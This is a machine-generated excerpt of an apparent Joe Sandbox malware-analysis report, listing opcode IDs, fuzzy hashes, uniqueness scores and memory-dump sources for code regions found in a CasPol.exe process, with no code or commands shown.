                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b10b602f24d4f00db84f012cd2a4c44ba834c6e231216cc18228f9f8e1b22173
                                    • Instruction ID: 9220a41aa711263e69c432f680f58c41a92c093343ae4cf74810c859525274e1
                                    • Opcode Fuzzy Hash: b10b602f24d4f00db84f012cd2a4c44ba834c6e231216cc18228f9f8e1b22173
                                    • Instruction Fuzzy Hash: 11719779A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f3681be80cf717d90c598a1530f3fda019c40c30db392060493f6045265a78f
                                    • Instruction ID: 649720285c34fae8538b8e48c12ba9d17417ec4feabd172fbfb1000f45288c6e
                                    • Opcode Fuzzy Hash: 8f3681be80cf717d90c598a1530f3fda019c40c30db392060493f6045265a78f
                                    • Instruction Fuzzy Hash: 57515934B001118FCB04DFB9C498AAD7BF6AF88345B2544B8E90ADB7A5EF359C45CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf070239e5c94a89c23ccca2bd4f77c805a9be2d814c42efcf802bc5fc0ed17f
                                    • Instruction ID: 087b50579de4ad11235c633a6591b17bf07ad3ca7059a867e243929db10819a2
                                    • Opcode Fuzzy Hash: cf070239e5c94a89c23ccca2bd4f77c805a9be2d814c42efcf802bc5fc0ed17f
                                    • Instruction Fuzzy Hash: A751E235A00219CFDB44CFA8C594A9EBBF2BF88314F218569E805AB651DB35ED42CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 264de6394de0795a8499a57240970339ea4f40726e05fc38d35fc2902be7c53a
                                    • Instruction ID: b6fe682668a58a366c7a3251d4b8702be8eaf7dea5bccc16114bf2ba689313cc
                                    • Opcode Fuzzy Hash: 264de6394de0795a8499a57240970339ea4f40726e05fc38d35fc2902be7c53a
                                    • Instruction Fuzzy Hash: 65415F34B002158FCF58EBB9C45466E7BF2AF88355B11482CD40AE7794EF38ED428B96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c0c48da29df2ce9c379c68781e58841c40b81f8b8d4e84764cff8dd6e9ad9401
                                    • Instruction ID: 2bb4f002d57aea3baccea4d3e79e82f57a9aa192f90e89d3c6636a641e8ffe4b
                                    • Opcode Fuzzy Hash: c0c48da29df2ce9c379c68781e58841c40b81f8b8d4e84764cff8dd6e9ad9401
                                    • Instruction Fuzzy Hash: E7618979A012299FCB61DF29D984A98BBF5FF48310F1081E9E80DA3755DB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9e85f267addb315aed79de9f6b3b3c35b8b839e928ce6bc52ca4288f8fa77bae
                                    • Instruction ID: ec0a17fb65727c40f340f3adbd3595aaf2e1ec4338dbe1cf5dc03c4cee54dcd8
                                    • Opcode Fuzzy Hash: 9e85f267addb315aed79de9f6b3b3c35b8b839e928ce6bc52ca4288f8fa77bae
                                    • Instruction Fuzzy Hash: 84414034F002148FCB54EFF9D59869EBBFAAF88255B104429E50AE3744EF389D41CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb825bb7704b7289f0e44c5fb3c22f904aeb15517e26926ae4a0dd314aa2b889
                                    • Instruction ID: f0f68c7bab501601a80031d323e406b3db0fa3422f60196bbde706c35dd8e0a4
                                    • Opcode Fuzzy Hash: bb825bb7704b7289f0e44c5fb3c22f904aeb15517e26926ae4a0dd314aa2b889
                                    • Instruction Fuzzy Hash: 6D41123474D7C05FE70293B869696663FB29F87208F0A44FBD549CF693E9288C09C362
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 659f71f5bd157e96f672805b31044a4730ae29992665cc2661266182faadc167
                                    • Instruction ID: a53403b6aa2b298631de44a110fd2be3c25d979248172194d429e208b0d770b7
                                    • Opcode Fuzzy Hash: 659f71f5bd157e96f672805b31044a4730ae29992665cc2661266182faadc167
                                    • Instruction Fuzzy Hash: B2517679A012299FCB61DF29D984A98BBF5FF48310F1181EAE80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ae807db60ac7dcce97d2ba40e545cc03d0df94cc4e17e631ac41665227706c9
                                    • Instruction ID: 6f70ec03ca72c0bbbf9be534c859c653abb79db576a88f9b2acec13a1ba2dae3
                                    • Opcode Fuzzy Hash: 2ae807db60ac7dcce97d2ba40e545cc03d0df94cc4e17e631ac41665227706c9
                                    • Instruction Fuzzy Hash: 4541C135B093845FD702EB78995469A7FF29F8B204B1580EAC448DF763EA389C06C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4016f31e65d3d0e2b97cd02ab49e74fdf0d5f7869217a245ac08259c817e7fe2
                                    • Instruction ID: 9b1ac082b2d2ac4150d688b48464ad1d4660fa410f7babd415efd948e1c20a14
                                    • Opcode Fuzzy Hash: 4016f31e65d3d0e2b97cd02ab49e74fdf0d5f7869217a245ac08259c817e7fe2
                                    • Instruction Fuzzy Hash: 90412A35A00204DFDB54DFA9C484A9EFBB2FF88315F558529D806AB645DB34ED428FA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2484d68202b79177887d86462348cd3f322d94b7d789db113233fb6d68295b42
                                    • Instruction ID: 43ac609f2faa8c7fe15a340f1f14244091573a0825ccf4bbc7827034dc9a56c3
                                    • Opcode Fuzzy Hash: 2484d68202b79177887d86462348cd3f322d94b7d789db113233fb6d68295b42
                                    • Instruction Fuzzy Hash: B0517775A012299FCB61DF29D984A98BBF5FF48310F1181E9E80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c64599f34948c4252acddb3fbe901741e774b2612e5a55858b3a812ce8674a82
                                    • Instruction ID: 82c2e8dc0a02ca484c2447aafc1dd8165ab60dfedee9a05df42dd39451dada8f
                                    • Opcode Fuzzy Hash: c64599f34948c4252acddb3fbe901741e774b2612e5a55858b3a812ce8674a82
                                    • Instruction Fuzzy Hash: 3C418F34B10115CFDB04ABB8E058BED7BF6AF88744F208169D846EB391DB78AC45CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b039c0d1ef1fca645934e8f16e44c5a82862ca80ad1a7f34403baf2c923c4f7
                                    • Instruction ID: 01967ddf141ea193ed17928342b2a9272e82c01ea5affdb30e3b27b15076ec00
                                    • Opcode Fuzzy Hash: 2b039c0d1ef1fca645934e8f16e44c5a82862ca80ad1a7f34403baf2c923c4f7
                                    • Instruction Fuzzy Hash: FB417F70B002158FCB58AF78946466EBAF7AFC8354B24952DD406D7344EE38EC42CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65fe6919eba3cad42bd91579ee2abee4722b29c2b7f43ffbbc78506688a509ec
                                    • Instruction ID: 1571311286d01092cf993c94ae0fd7d0994f0637470ca218fc630f78e40227be
                                    • Opcode Fuzzy Hash: 65fe6919eba3cad42bd91579ee2abee4722b29c2b7f43ffbbc78506688a509ec
                                    • Instruction Fuzzy Hash: DC31BE34F002549FCB59EBB894A836E7FF29F89244B10447ED50ADB791EE389C42C796
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f32517abe74676f251943aa7b0d9fc0d0e08edc37d9537ada7b8046d530d82d4
                                    • Instruction ID: 80cc2d14a049fd6c39dfbdefd65efe04147df68a7a8ac2f7930d17f3c45ede66
                                    • Opcode Fuzzy Hash: f32517abe74676f251943aa7b0d9fc0d0e08edc37d9537ada7b8046d530d82d4
                                    • Instruction Fuzzy Hash: 15517775A012299FCB61DF29D984A98BBF5FF48310F1081E9E80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf948730fcb2d9646fd8badb90b82d7d810449a9b03ae2e8df268387724cf073
                                    • Instruction ID: 284dceeb3618bb04c086e2085e97b32ca3345cb3687d0de1711e1de780acafa8
                                    • Opcode Fuzzy Hash: cf948730fcb2d9646fd8badb90b82d7d810449a9b03ae2e8df268387724cf073
                                    • Instruction Fuzzy Hash: 8C31B238B002504FCB49EBB8A4A436E3BE29FC9209B11447DD50ADB391EF39DC02C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a391ffe9c133c099bed77d15b6c4864388a37cf8cdbcba107e171a1f1c923194
                                    • Instruction ID: 97557653702ed220f868ec1043e7ff518a6ee1f60483efc34e7398b9e2d307f2
                                    • Opcode Fuzzy Hash: a391ffe9c133c099bed77d15b6c4864388a37cf8cdbcba107e171a1f1c923194
                                    • Instruction Fuzzy Hash: 9541F172A043849FD701CFA8C480BDEBFB2AF4A309F1584AAD405EB692D635AC45CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fe3b646743e27ac15ba35e0289711266183343910bcf08c193bd16218dcb568f
                                    • Instruction ID: 208923559fe9dfc05e3baca50fbcd63b85aa5ee8d8189849a2ae616009ae2fb4
                                    • Opcode Fuzzy Hash: fe3b646743e27ac15ba35e0289711266183343910bcf08c193bd16218dcb568f
                                    • Instruction Fuzzy Hash: A8314A70B002158FCB58AF78D4A466EBAF6AF88254B24992DC406D7750EE39EC42CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 34ab448f99c6a1a1271c971315c559d534dd62e279c1baf1c426e76957ad8928
                                    • Instruction ID: 79df7f409bb1b40cb93824ca417534d6560b614781ad5bc3e84b6f887c1738a0
                                    • Opcode Fuzzy Hash: 34ab448f99c6a1a1271c971315c559d534dd62e279c1baf1c426e76957ad8928
                                    • Instruction Fuzzy Hash: AC315674F402259BDF54DBB9DC68BAE7AF66F88744F108428E50AE7380EE38D841D760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dceb19a80a4410be66b1e825fd93d192d9365470e8ab65c0b3bcb1ed6682c8f1
                                    • Instruction ID: 176a49cea83ff15f27183c63707bced8a2fe3881a89a861a2cb68025569eec04
                                    • Opcode Fuzzy Hash: dceb19a80a4410be66b1e825fd93d192d9365470e8ab65c0b3bcb1ed6682c8f1
                                    • Instruction Fuzzy Hash: 49416875A012299FCB62DF29D984A98BBF5FF48310F1081E9E80DA3755DB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49df1120d7bf79a9e60d853b3438771592c4c5fc6dde4bd8953120b8d93821ad
                                    • Instruction ID: 0a34b2effaee8db6816eaa74a0070c766db028b9cc653b492d5162ea7afba5ef
                                    • Opcode Fuzzy Hash: 49df1120d7bf79a9e60d853b3438771592c4c5fc6dde4bd8953120b8d93821ad
                                    • Instruction Fuzzy Hash: 6E311474F442259BDF54DBB5D868BAE7AF6AF88744F108428E506E7380EE389C40D7A4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7fdc14dd80e06e1430455e867d4b535d59317bd2282a27ddc2c6bbf24985598c
                                    • Instruction ID: 00004602060a13b699c1dc1ae569bbe40e0e080870531af001ae2258268add25
                                    • Opcode Fuzzy Hash: 7fdc14dd80e06e1430455e867d4b535d59317bd2282a27ddc2c6bbf24985598c
                                    • Instruction Fuzzy Hash: 8F218271F002259FDB10FBB4A84435E7BF5AB88750F118469D509E7280EB3CAD4187A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cb668dfd400a9f6c955bf4c9487ba2f6c4e742303a92ab005f760f7bb583643
                                    • Instruction ID: 3467800a603a728f17f2228fd7ff58286859d67006fc422589ec10a8850bcf30
                                    • Opcode Fuzzy Hash: 6cb668dfd400a9f6c955bf4c9487ba2f6c4e742303a92ab005f760f7bb583643
                                    • Instruction Fuzzy Hash: 9531C835B082948FCB02EB7CA950A9F7FF5AF89204B1540AAD449DB742EA38AD05C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 45e1928893e23d5d840c6859bfaca260424f982fe8ae556895a958373f82216d
                                    • Instruction ID: b80ff65d5d4d8082a5c7c1069cbd7a0f7f33e1d2e22f466f79df08364b73dfd5
                                    • Opcode Fuzzy Hash: 45e1928893e23d5d840c6859bfaca260424f982fe8ae556895a958373f82216d
                                    • Instruction Fuzzy Hash: 8331D535B042948FDB42EB78A95469E7BF69F8E200B1480BAD40CEB752DA389D02C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2f2bc98c2459dc4e486850cdeb72e8efa2badb068ffcb1d7f5c6bd1a6e30ec2
                                    • Instruction ID: cf88f3f6dd335cdfcb2335a5bc061e88a4fe9e6854d4eb1811a902d746495142
                                    • Opcode Fuzzy Hash: f2f2bc98c2459dc4e486850cdeb72e8efa2badb068ffcb1d7f5c6bd1a6e30ec2
                                    • Instruction Fuzzy Hash: 2131E635B042448FC702DBB8D554AAE7FF6DF89254B2580B9D508DB352EE38DC02C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79af53e39f4e7a721fab883fdf431a0f7f3b08b3002423b563af21a424a55c72
                                    • Instruction ID: 30130cb08e72bee1f1a9ebb9e2558ee4e08d3cbc76af8e1782b89e86b541ea65
                                    • Opcode Fuzzy Hash: 79af53e39f4e7a721fab883fdf431a0f7f3b08b3002423b563af21a424a55c72
                                    • Instruction Fuzzy Hash: 4B310775B043948FDB02DBB8955469E7FF2AFCF200B1140AAD049DB752DE389D02C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c0e4436a15ab7591f6022a7c3e8cf597e095221da3b4f79c3209866853b27f5
                                    • Instruction ID: 89ecfb3ca0cf4093cb32a7fb868480c2951ed9ca87275bb85dac833da8b148e7
                                    • Opcode Fuzzy Hash: 4c0e4436a15ab7591f6022a7c3e8cf597e095221da3b4f79c3209866853b27f5
                                    • Instruction Fuzzy Hash: 0031AE347402519FD700EB7AE894A5A3BA6BBC0301F04C578D80D9B6A5EF78EC468BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 68ec95aa80c1faae6588f897c0bcfdf10b7cc82b0ba82652b02f48387dc01ca4
                                    • Instruction ID: 62a9e89938471c66c1e544ad1c4e19dc11806f64e67ac30500ad8b337bfd2117
                                    • Opcode Fuzzy Hash: 68ec95aa80c1faae6588f897c0bcfdf10b7cc82b0ba82652b02f48387dc01ca4
                                    • Instruction Fuzzy Hash: D2417579A002299FCB61DB29D984A98BBF5FF48310F1081EAE80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8bacce441c5beab7a8ca12cddbdb4b298124039f62a19edaedc35698ae4554ef
                                    • Instruction ID: 257d83ef38819731258b3e5869db1ccdeace2b3d7367910ceff9c18228fd9665
                                    • Opcode Fuzzy Hash: 8bacce441c5beab7a8ca12cddbdb4b298124039f62a19edaedc35698ae4554ef
                                    • Instruction Fuzzy Hash: CF210074F043495FDB15EBB8A8642AE7FF29FCA254B14406AD509DB381FF388C028786
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd5658b6d7321ccdb7209b525d42c298c0b76b579d8a5c90f772e849a9224ec5
                                    • Instruction ID: 03cb5f7cfc40c5fd33227d7df0230ebdc906790f47e6e1ee3ca4645ff55a115a
                                    • Opcode Fuzzy Hash: dd5658b6d7321ccdb7209b525d42c298c0b76b579d8a5c90f772e849a9224ec5
                                    • Instruction Fuzzy Hash: C4219F30A102958FDB15EF78D46869E7FF1AF49254F1059ADD802EB3A1EB38AC41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4676998266b9e11716f4570449490c7b578423573c1f869c7b035c30ec709b5
                                    • Instruction ID: fbb634e4672011e43c4845e7a46bae44050f31c430f7451d52fafac602da8ca6
                                    • Opcode Fuzzy Hash: b4676998266b9e11716f4570449490c7b578423573c1f869c7b035c30ec709b5
                                    • Instruction Fuzzy Hash: 37317679A052299FCB61DB29D984A98BBF5FF48310F1081E9E80DA3755DF315E918F01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 336165bdec19c9279ec27792242744ca5e9105439081c7fdf6294aea8a6e77ce
                                    • Instruction ID: fb6c6944a047bd72ba8229d898a20a15f5543e826ba303b32490ea60583b932b
                                    • Opcode Fuzzy Hash: 336165bdec19c9279ec27792242744ca5e9105439081c7fdf6294aea8a6e77ce
                                    • Instruction Fuzzy Hash: 62210E35F042488FCB41EBB8A5506DEBFF2EF8E25072040AAD108E7351EB389D028791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6e44fc8b530583815f199f341174ac58c758eb09deefd20e27e621d18117e85
                                    • Instruction ID: af285b6f38cece839acb87b22c6e0d966d25458b0a62f69367ed9bac44e33cb7
                                    • Opcode Fuzzy Hash: d6e44fc8b530583815f199f341174ac58c758eb09deefd20e27e621d18117e85
                                    • Instruction Fuzzy Hash: D521A175E042499FC704EFA8E58459DBFF2AF88320F148076D548EB341EB3DD8428B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c3aa57497fda89ad24deafd70b686bfca7bcd952ee9295a491dc4a661257875c
                                    • Instruction ID: ae5d1eee5e056bae1806bb49a034146d8219ebab888bf11bb3f934e537785ca0
                                    • Opcode Fuzzy Hash: c3aa57497fda89ad24deafd70b686bfca7bcd952ee9295a491dc4a661257875c
                                    • Instruction Fuzzy Hash: 7C216234A002558FCB14EB78D4687AE7BF5AF48255F10587DD802EB390EF39AC41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e946023ab87798b276ce85829163a603123dac96c98cf131e019a0e7080e6d72
                                    • Instruction ID: 4f013ee0a1b873ff1e95931f98473b295d48d4cab85763cebdb7d53e6addbce1
                                    • Opcode Fuzzy Hash: e946023ab87798b276ce85829163a603123dac96c98cf131e019a0e7080e6d72
